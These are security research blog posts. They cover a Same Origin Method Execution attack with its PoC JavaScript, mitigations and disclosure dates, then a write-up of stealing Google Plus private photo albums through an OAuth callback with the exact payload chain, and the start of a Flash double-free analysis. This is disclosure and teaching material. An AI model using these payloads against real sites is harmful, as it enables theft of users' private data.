<span style="color: #6ab825; font-weight: bold;">function</span> <span style="color: #d0d0d0;">startSOME()</span> <span style="color: #d0d0d0;">{</span>
<span style="color: #24909d;">window</span><span style="color: #d0d0d0;">.open(</span><span style="color: #ed9d13;">"step1.html"</span><span style="color: #d0d0d0;">);</span>
<span style="color: #d0d0d0;">location.replace(</span><span style="color: #ed9d13;">"http://www.vulnerable-domain.com/privateAlbum"</span><span style="color: #d0d0d0;">);</span>
<span style="color: #d0d0d0;">}</span>
<span style="color: #24909d;">document</span><span style="color: #d0d0d0;">.body.addEventListener(</span><span style="color: #ed9d13;">"click"</span><span style="color: #d0d0d0;">,startSOME);</span> <span style="color: #999999; font-style: italic;">//Popup Blocker trick</span>
<span style="color: #6ab825; font-weight: bold;"></script></span>
</pre>
</div>
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">@step1.html:</span><br />
<!-- HTML generated using hilite.me -->
<br />
<div style="background: #202020; border-width: .0em .1em .1em .8em; border: solid gray; overflow: auto; padding: .2em .6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: #6ab825; font-weight: bold;"><script></span>
<span style="color: #6ab825; font-weight: bold;">function</span> <span style="color: #d0d0d0;">waitForDOM()</span> <span style="color: #d0d0d0;">{</span>
<span style="color: #d0d0d0;">location.replace(</span><span style="color: #ed9d13;">"http://www.vulnerable-domain.com/flash-plugin.swf?callback=opener.document.body.privateAlbum.firstChild.nextElementSibling.submit"</span><span style="color: #d0d0d0;">);</span>
<span style="color: #d0d0d0;">}</span>
<span style="color: #d0d0d0;">setTimeout(waitForDOM,</span><span style="color: #3677a9;">3000</span><span style="color: #d0d0d0;">);</span>
<span style="color: #6ab825; font-weight: bold;"></script></span>
</pre>
</div>
<br />
<br /></div>
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: 12.0pt; line-height: 107%;">Mitigation
and Fix<o:p></o:p></span></b>
<br />
<div class="MsoListParagraphCxSpFirst" style="mso-list: l1 level1 lfo2; text-indent: -18.0pt;">
<ol>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><b>Static Callbacks</b> - Exploiting Same Origin Method Execution relies on abusing a callback parameter. Many web applications can actually maintain their same existing functionality without having to dynamically set callbacks. Thus, when applicable, websites should use fixed callback values as opposed to externalizing the callback control.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><b>White-list approach – </b>In cases where the web application is designed for supporting more than a single callback per endpoint, or, alternatively, where maintaining a high flexibility is highly important (common in Flash plugins), it is better to set a white-list and match the given callback parameter value against it. This would enforce and verify that only legitimate callback functions can execute.</span><span style="font-family: Arial, Helvetica, sans-serif;">UPDATE: I am working on a JavaScript defense library aiming to serve as a generic and easy to deploy solution.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><b>Cross-Domain Messaging – </b>Use postMessage for notifying events and interacting to and from cross-domains as an alternative to javascript callback execution (if applicable).</span></li>
</ol>
<span style="font-family: Arial, Helvetica, sans-serif;"><o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo2; text-indent: -18.0pt;">
<span style="font-family: Arial, Helvetica, sans-serif;"><o:p></o:p></span></div>
<div class="MsoListParagraphCxSpLast" style="mso-list: l1 level1 lfo2; text-indent: -18.0pt;">
<span style="font-family: Arial, Helvetica, sans-serif;"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: 12.0pt; line-height: 107%;">Responsible
Disclosure:<o:p></o:p></span></b></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><span style="color: #e69138;">Oct 30, 2014: Google</span> </b>fixed a vulnerable instance –
Google Plus.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><span style="color: #e69138;">Nov 06, 2014: Microsoft</span> </b>fixed a vulnerable instance –
Yammer.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: 14.45pt; margin-bottom: .0001pt; margin-bottom: 0cm;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><span style="color: #e69138;">April 21, 2015: Wordpress</span></b> fixed a vulnerable
instance – Plupload.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal" style="line-height: 14.45pt; margin-bottom: .0001pt; margin-bottom: 0cm;">
<span style="font-family: Arial, Helvetica, sans-serif;">(Kudos to @zoczus for finding yammer and plupload instances)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">The issue of callback exploitation is known to a certain level in the infosec community, although until recently the attack did not catch enough attention. For that reason website owners, including the leading players, still rely on developers’ habits and experience. More importantly, no ‘best practice’ or standard was published as of now. Thus I chose to shed some light on Same Origin Method Execution and callback endpoints during the BlackHat conference. Several aspects of Same Origin Method Execution have been discovered by top researchers namely Google's Aleksandr Dobkin and LinkedIn's Roman Shafigullin. They both certainly deserve credit here.</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif;">It is noteworthy that Google Bug Bounty deemed this attack’s impact similar to that of cross-site scripting. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Microsoft Bug Bounty deemed this attack’s impact similar to that of cross-site scripting.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Wordpress classified this attack like "XSS" in their critical security release (Apr. 2015 - <a href="https://wpvulndb.com/vulnerabilities/7933" target="_blank">WordPress 3.9-4.1.1 - Same-Origin Method Execution</a>).</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">The Same Origin Method Execution attack can lead to ugly and critically severe consequences for its targeted victims. Keep in mind that the attack’s risk is considered as high as the risk of </span><span style="font-family: Arial, Helvetica, sans-serif;">Cross-site scripting</span><span style="font-family: Arial, Helvetica, sans-serif;">, rated the "third most risky attack" in OWASP top 10 project - that is A3 Cross-site scripting (XSS). To conclude, it is really important to abandon the misconception that a narrow set of characters somehow guarantees safety and security, of your web applications. Further, we should strive to raise the developers’ awareness of SOME.</span><br />
<div>
<br /></div>
</div>
</div>
[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com7tag:blogger.com,1999:blog-7534521580510357281.post-71231495182599875812015-05-25T22:59:00.000+03:002017-04-02T19:22:29.451+03:00Stealing Private Photo Albums from Google - Same Origin Method Execution<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">It has been a long time since I updated this blog since I
focused on company blogs and Black Hat presentations for the last couple of
years. It is time to kick in with details about the vulnerable Google instance
I was demonstrating during my <a href="https://www.blackhat.com/eu-14/briefings.html#same-origin-method-execution-some-exploiting-a-callback-for-same-origin-policy-bypass">Black Hat EU presentation – Same Origin Method Execution</a>. Using that
instance and a payload of only alphanumeric characters and a dot I was able to hijack web functionality and thereby delete or steal private photo albums from Google
Plus. A white paper is currently in review stages and will be released next week in my next post! </span></div>
<div class="MsoNormal">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw_M0Qa_qngVdCZoJ71tnjI5IF2NbVJoPozXMo0gPzENhphDN463q5oqvRJenjklExwcscB4Qu6WshkSiNHUbHR8fvksrIqujvSW3NkNsnrOw-HmxtuHl0PNTslho_96NsSb8zLgcD1No/s1600/Presentation1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw_M0Qa_qngVdCZoJ71tnjI5IF2NbVJoPozXMo0gPzENhphDN463q5oqvRJenjklExwcscB4Qu6WshkSiNHUbHR8fvksrIqujvSW3NkNsnrOw-HmxtuHl0PNTslho_96NsSb8zLgcD1No/s400/Presentation1.png" width="97%" /></a></div>
<br />
<br /></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><v:shapetype coordsize="21600,21600" filled="f" id="_x0000_t75" o:preferrelative="t" o:spt="75" path="m@4@5l@4@11@9@11@9@5xe" stroked="f">
<v:stroke joinstyle="miter">
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0">
<v:f eqn="sum @0 1 0">
<v:f eqn="sum 0 0 @1">
<v:f eqn="prod @2 1 2">
<v:f eqn="prod @3 21600 pixelWidth">
<v:f eqn="prod @3 21600 pixelHeight">
<v:f eqn="sum @0 0 1">
<v:f eqn="prod @6 1 2">
<v:f eqn="prod @7 21600 pixelWidth">
<v:f eqn="sum @8 21600 0">
<v:f eqn="prod @7 21600 pixelHeight">
<v:f eqn="sum @10 21600 0">
</v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:formulas>
<v:path gradientshapeok="t" o:connecttype="rect" o:extrusionok="f">
<o:lock aspectratio="t" v:ext="edit">
</o:lock></v:path></v:stroke></v:shapetype><v:shape id="Picture_x0020_3" o:spid="_x0000_i1025" style="height: 162.6pt; mso-wrap-style: square; visibility: visible; width: 431.4pt;" type="#_x0000_t75">
<v:imagedata o:title="Presentation1" src="file:///C:\Users\bhayak\AppData\Local\Temp\msohtmlclip1\01\clip_image001.png">
</v:imagedata></v:shape><o:p></o:p></span></div>
<div class="MsoNormal">
<b><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;">Same Origin Policy and OAuth overview:<o:p></o:p></span></b><br />
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;">From time to time and </span><span style="font-family: "arial" , "helvetica" , sans-serif;">for numerous reasons </span><span style="font-family: "arial" , "helvetica" , sans-serif;">web applications interact with external third-party services. Some of these reasons may be importing information (e.g. import contact list),
notifying events, getting delegated access to resources such providing a "Login with" systems and etc. </span><br /><br/>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSmGMXe1uCvg1gfxBluXhacL6V7rBDpBr-5dCxsHSqMCebFEfnQF8pTyrN1nl6weURagXK5JXhl4T4UzGf4cNPxLueSdUUS5L7-UjxYmjM8CYS9jsdQvgppwgZN-_ZrePq329YZ9bA9u8/" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSmGMXe1uCvg1gfxBluXhacL6V7rBDpBr-5dCxsHSqMCebFEfnQF8pTyrN1nl6weURagXK5JXhl4T4UzGf4cNPxLueSdUUS5L7-UjxYmjM8CYS9jsdQvgppwgZN-_ZrePq329YZ9bA9u8/" height="" title="Third-party example" width="320" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Since an external
service often (if not always) means a different security context, interacting with it will require
overcoming Same Origin Policy (SOP). One of the most common interfaces for such third-party interaction these days
is using OAuthentication dialogs. OAuth dialogs are hosted on third-party resource providers and are designed to ask the resource owner (the user) to allow/deny access from the website to the user's (resource owner) private resources. Once an answer is given the dialog will redirect
(call) the user back to a callback page hosted on the website which asked for
access, this page is called the “callback endpoint”. The purpose of the
callback endpoint is to receive a token from the third-party and notify the
requesting website. Although, since no best practice was created for building callback endpoints, the technique web developers use to save the token and
notify the initiating page (call it back) is based entirely on developers’
habit and experience. Therefore many times callback endpoints end up prone to “Same Origin Method Execution”.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNormal">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">The vulnerable instance: <o:p></o:p></span></b><br />
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;">How many times have you noticed a "Login with", import contacts or friend lists from third-party service? </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://winsupersite.com/content/content/143969/ppl.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="" border="0" src="http://winsupersite.com/content/content/143969/ppl.jpg" height="200" title="importing contacts example" width="320" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">As in many other websites Google Plus provides an option to import external contacts information from third-party
resource providers such as Yahoo and Microsoft, Prior to the responsible
disclosure the authorization process occurred as follows:</span><br />
<br />
<ol>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Google Plus </span><b style="font-family: Arial, Helvetica, sans-serif;">opened a
pop-up</b><span style="font-family: "arial" , "helvetica" , sans-serif;"> for the OAuth dialog asking secure delegated access to the user’s external contact-list on Yahoo/Microsoft, to avoid losing the currently open document
content. </span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">After the user allows/denies the access, the dialog window document is redirected to a Google Plus callback endpoint consisting a <b>callback URL parameter</b>.</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">The endpoint page uses the
value provided by the parameter to </span><b style="font-family: Arial, Helvetica, sans-serif;">notify the opener and deliver the access
token</b><span style="font-family: "arial" , "helvetica" , sans-serif;"> (JSONP style).</span></li>
</ol>
</div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Callback endpoint URL: <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://plus.google.com/c/u/0/auth?src=connectedaccounts&callback=<span style="color: orange;">callback_function_name</span>&dest=microsoft2&[...snip...]<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Accessing the callback endpoint URL directly responded with
the following markup:<o:p></o:p></span><br />
<br /></div>
<div class="MsoNormal">
<div class="MsoNormal">
<div style="overflow: auto; padding: .2em .6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: #6ab825; font-weight: bold;"><html><body><script </span><span style="color: #bbbbbb;">type=</span><span style="color: #cccccc;">"text/javascript"</span><span style="color: #6ab825; font-weight: bold;">></span>
<span style="color: yellow;">window</span><span style="color: #d0d0d0;">.opener.</span><span style="color: orange;">callback_function_name</span><span style="color: #d0d0d0;">({</span><span style="color: #cccccc;">"status"</span><span style="color: #d0d0d0;">:</span><span style="color: #3677a9;">0</span><span style="color: #d0d0d0;">,</span><span style="color: #cccccc;">"token"</span><span style="color: #d0d0d0;">:</span><span style="color: #cccccc;">"ItHumYWI[...snip..]"</span><span style="color: #d0d0d0;">,</span><span style="color: #cccccc;">"oauthstate"</span><span style="color: #d0d0d0;">:</span><span style="color: #cccccc;">"1234"</span><span style="color: #d0d0d0;">,</span><span style="color: #cccccc;">"tokenid"</span><span style="color: #d0d0d0;">:</span><span style="color: #cccccc;">"ToKeN1234"</span><span style="color: #d0d0d0;">,</span><span style="color: #cccccc;">"tokenexp"</span><span style="color: #d0d0d0;">:</span><span style="color: #cccccc;">"0"</span><span style="color: #d0d0d0;">,</span><span style="color: #cccccc;">"gid"</span><span style="color: #d0d0d0;">:</span><span style="color: #cccccc;">"401223423.."</span><span style="color: #d0d0d0;">,</span><span style="color: #cccccc;">"siteid"</span><span style="color: #d0d0d0;">:</span><span style="color: #3677a9;">6</span><span style="color: #d0d0d0;">,</span><span style="color: #cccccc;">"displayname"</span><span style="color: #d0d0d0;">:</span><span style="color: #cccccc;">"Ben Hayak"</span><span style="color: #d0d0d0;">,</span><span style="color: #cccccc;">"profileurl"</span><span style="color: #d0d0d0;">:</span><span style="color: #cccccc;">"http://profile-url.com"</span><span style="color: #d0d0d0;">});</span>
<span style="color: #6ab825; font-weight: bold;"></script></body></html></span>
</pre>
</div>
</div>
</div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<b><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;">Is that Cross-site scripting?</span></b></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Of course the first thing to try here was Cross-site Scripting,
although fortunately ;) in similarity to most callback endpoint implementations
only a specific set of characters were allowed as a callback value specifically
alphanumeric a dot and underscore [A-Za-z0-9_\.]. We can however use tricks
like document.write, eval, etc, though as aforementioned in the markup above no
user controlled input got inside the parenthesis so XSS is out of the question<b>.<o:p></o:p></b></span><br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span></div>
<div class="MsoNormal">
<b><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;">“NULL means no!?” <o:p></o:p></span></b></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">When accessing the callback endpoint directly the
window.opener property is null, so it appears that the instance is not
vulnerable. However there is a technique to control the opener window. The
first idea that came to mind was to create a bug chain, by finding another page
in google plus that will force opening a window with an arbitrary URL and combine that with the callback endpoint. Although finding such
a page is a little too rare and will weaken the attack.<o:p></o:p></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<b><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;">Window Objects in memory:<o:p></o:p></span></b></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">So let’s try different approach, I wanted to entirely control
a window and set its document to whatever page in Google Plus and then tell the
Google Plus callback endpoint “This is your opener window deal with it”. That’s
exactly what you can acheive in “Same Origin Method Execution” all you need is a page
that opens another window and a set of redirection and you can designated any window as the opener and start hijacking methods! The key element that makes this a
successful approach is the nature of user agents. When a window <b>document</b>
is being redirected its window object remains at the original allocated memory
space, therefore any other window/s that holds a reference to it as “opener” can
still use the reference to access the opener window even after the document
changed/redirected.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">If window A opens window B, the user agent will create a
reference to window A as window.opener property of window B, when window A’s
document would change (redirect) the reference won’t be cleared/deleted and
window B can still use the opener property to reference it.<o:p></o:p></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;">So the answer is pretty clear, all there’s left is to make a
malicious html that will open another window via “<i>window.open(‘/step1.html’)</i>” ,
then redirect the first window to a designated document on Google Plus, and
redirected the pop-up window to the callback endpoint. This way you can set any
page as the opener of the callback endpoint.<o:p></o:p></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTyXjXreDx0NCyDTQ30pQsAmvdJxKJhoXmT3QEVQJzHXhhb19J5BuWNF0JkAu3A3uxLy-3UAZhk0Uo3GbQpMtOUIJDpGQWVApK3agV44FIVpTaALZot5Uesbu8ChQQXJVnxBsIM9bjNhk/s1600/o-SINGLE-WOMAN-facebook.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTyXjXreDx0NCyDTQ30pQsAmvdJxKJhoXmT3QEVQJzHXhhb19J5BuWNF0JkAu3A3uxLy-3UAZhk0Uo3GbQpMtOUIJDpGQWVApK3agV44FIVpTaALZot5Uesbu8ChQQXJVnxBsIM9bjNhk/s400/o-SINGLE-WOMAN-facebook.jpg" width="400" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<b><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;">Stealing Private Photo Albums with SOME:<o:p></o:p></span></b><br />
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;">I covered how to control an opener and abuse a vulnerable
callback endpoint to execute any DOM/Javascript function at the context of the
opener window. All there’s left is to choose a page containing an interesting
web functionality and use only <span style="color: #f6b26b;">alphanumeric and a dot</span> to assemble a payload that
will hijack this web functionality (Similar to the impact of CSRF but we don’t
mind CSRFTokens or other protective mechanisms).
<o:p></o:p></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;">The target document I used:</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Google Plus can </span><span style="font-family: "arial" , "helvetica" , sans-serif;">automatically </span><span style="font-family: "arial" , "helvetica" , sans-serif;">backup private cell photos to Google servers in case G+ is installed as a mobile application on your phone. Fortunately Google created a service called “Google Picker” which allows
users to share their photos, videos and documents stored in Google servers with
third-party websites.</span></div>
<div class="MsoNormal">
<br />
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Now that I've designated a target document (Google Picker) I setup the attack page as follows:</span></div>
</div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l2 level1 lfo2; text-indent: -18.0pt;">
<ol>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Set a page that </span><b style="font-family: Arial, Helvetica, sans-serif;">opens
two pop-up windows </b><span style="font-family: "arial" , "helvetica" , sans-serif;">to control their opener.</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Redirect</b> the page to Google
Plus instance of Picker.</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Wait for the DOM to complete
loading.</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Redirect</b> the first pop-up
to the vulnerable callback endpoint with a callback parameter set to: </span><i style="font-family: Arial, Helvetica, sans-serif;"><span style="color: #f6b26b;">document.activeElement.parentElement.parentElement.parentElement.previousSibling.lastChild.click</span></i></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Redirect</b> the second pop-up
to the vulnerable callback endpoint with a callback parameter set to: </span><i style="font-family: Arial, Helvetica, sans-serif;"><span style="color: #f6b26b;">pickerApp.V.Fa.PA</span>
</i><span style="font-family: "arial" , "helvetica" , sans-serif;">which made the service send all the selected photos to my own domain.</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Send the malicious setup to
a chosen victim (In my case Google Bug bounty responsible disclosure :)</span></li>
</ol>
</div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;">The exploit resulted in hijacking the following JavaScript
functions:</span></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l0 level1 lfo3; text-indent: -18.0pt;">
<ol>
<li><i style="font-family: Arial, Helvetica, sans-serif;">window.opener.document.activeElement.parentElement.parentElement.parentElement.previousSibling.lastChild.click({JSONDATA});</i></li>
<li><i style="font-family: Arial, Helvetica, sans-serif;">window.opener.pickerApp.V.Fa.PA({JSONDATA});</i></li>
</ol>
</div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;">This flow could make any user send every single photo from his/her private album to my server.</span><o:p></o:p><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>BlackHat EU Video:</b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/s_vi/mYaNzLTb380/default.jpg?sqp=CNzOjKsF&rs=AOn4CLD3OAijMmD3tnyj8Q69Yys_zMsGHQ" frameborder="0" height="266" src="https://www.youtube.com/embed/mYaNzLTb380?feature=player_embedded" width="320"></iframe></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Additional use cases: </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">I exploited the same instance to delete Google Plus timeline posts. </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Note: The issue is now fixed as it has been reported to Google bug bounty program.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Hope you enjoyed reading!</span><br />
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com5tag:blogger.com,1999:blog-7534521580510357281.post-25532206687378869832014-05-10T20:58:00.003+03:002014-05-10T21:00:13.671+03:00<h2>
<span style="color: #f6b26b; font-family: Arial, Helvetica, sans-serif; font-size: x-large;">Deep Analysis of CVE-2014-0502 – A Double Free Story</span></h2>
<div>
<div style="direction: ltr;">
<div style="direction: ltr;">
<br />
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: Arial, sans-serif;">The Adobe Flash Player zero-day that was part of a targeted attack that infected several nonprofit organizations’ websites.</span><br />
<span style="font-family: Arial, sans-serif;"><br /></span>
<span style="font-family: Arial, sans-serif;">The vulnerability is a double-free vulnerability caused by a bug in how shared objects are handled by Adobe Flash Player.</span><br />
<span style="font-family: Arial, sans-serif;"><br /></span><span style="font-family: Arial, sans-serif; font-size: large;">The full story:</span><br />
<span style="font-family: Arial, sans-serif; font-size: large;"><u><a href="http://blog.spiderlabs.com/2014/03/deep-analysis-of-cve-2014-0502-a-double-free-story.html">http://blog.spiderlabs.com/2014/03/deep-analysis-of-cve-2014-0502-a-double-free-story.html</a></u></span><br />
<br />
<span style="font-family: Arial, sans-serif;">A double free vulnerability occurs during the termination of adobe flash worker. when a worker is being terminated, all shared objects (also called as "flash cookies") are flushed an then freed from memory. while failing to flush an off limit "shared object" to disk (for being above 100KB data) a garbage collection occurs. the garbage collection decides to free the "shared object" from memory whilst the first free operation is still in process.</span><br />
<span style="font-family: Arial, sans-serif;"><br /></span>
<span style="font-family: Arial, sans-serif;">a screenshot presenting a "record" shared object while exploiting the vulnerable code and controlling EIP (0xcccccccc+8):</span><br />
<div>
<span style="font-family: Arial, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisaDV9s4LCTf471tSd_-Mp7EmhOTQirOOr7JnBkKb8OPk2ND-Q6SV8u0XP2a4w4wM5UBeOWDEsFUG4aim1avjIJEPO9cAu569js3-G8T4WeBRffKkju5HoDquSe5KDhRO7a-WrijwEp5A/s1600/006-crash+breakpoints.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisaDV9s4LCTf471tSd_-Mp7EmhOTQirOOr7JnBkKb8OPk2ND-Q6SV8u0XP2a4w4wM5UBeOWDEsFUG4aim1avjIJEPO9cAu569js3-G8T4WeBRffKkju5HoDquSe5KDhRO7a-WrijwEp5A/s1600/006-crash+breakpoints.PNG" width="100%" /></a></div>
<span style="font-family: Arial, sans-serif;">the screenshot blow presents the internal SharedObject destructor procedure, you can notice that there's a flag that checks whether flushing data to disk is required.</span><br />
<span style="font-family: Arial, sans-serif;">the "SharedObject" has data pending for flushing but fails to do so since the data exceeds the 100KB limit. then during the flushing attempt, garbage collection fires and frees the object without clearing this "pending flush" flag.</span><br />
<span style="font-family: Arial, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
